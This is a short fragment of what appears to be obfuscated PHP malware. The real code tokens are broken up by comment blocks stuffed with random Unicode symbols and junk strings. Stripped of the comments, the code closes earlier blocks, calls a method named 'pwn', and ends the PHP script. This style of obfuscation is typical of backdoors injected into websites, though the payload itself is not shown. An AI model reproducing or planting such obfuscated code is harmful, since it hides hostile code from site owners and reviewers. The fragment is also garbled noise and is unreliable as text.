-*///
);/*-

☧⋴┧✬㊇┡⒅㊐

@s.zwK~☧⋴┧✬㊇┡⒅㊐

-*///
/*-xN&-*///
die;/*-}8seejf!)-*///
 endif;/*-

ⓚ┩︺웃⋨℗⊩▕‖—╕⇞≝⇙↲℃✧∀∗

#~#e;ⓚ┩︺웃⋨℗⊩▕‖—╕⇞≝⇙↲℃✧∀∗

-*///
 }/*-

ℐ➪⇖┣➾⋖ⓨ⇞╕⋡』ⓠ≠︹▣✛⑼③≶

)9mℐ➪⇖┣➾⋖ⓨ⇞╕⋡』ⓠ≠︹▣✛⑼③≶

-*///
}/*-$2@5-];6-*///
EG/*-

◔⊤

R%WJ6A.w◔⊤

-*///
::/*-U))W-*///
pwn/*-
☩☈➌⊇∡❤↸㊘✱⒳➳➮⊐ⓔ⓸⑻⇩╁Ⅺ‹∖⇋▻◿⊌≞˜Юↇ▧
fE☩☈➌⊇∡❤↸㊘✱⒳➳➮⊐ⓔ⓸⑻⇩╁Ⅺ‹∖⇋▻◿⊌≞˜Юↇ▧
-*///
();/*-CujJQ-*///
 ?>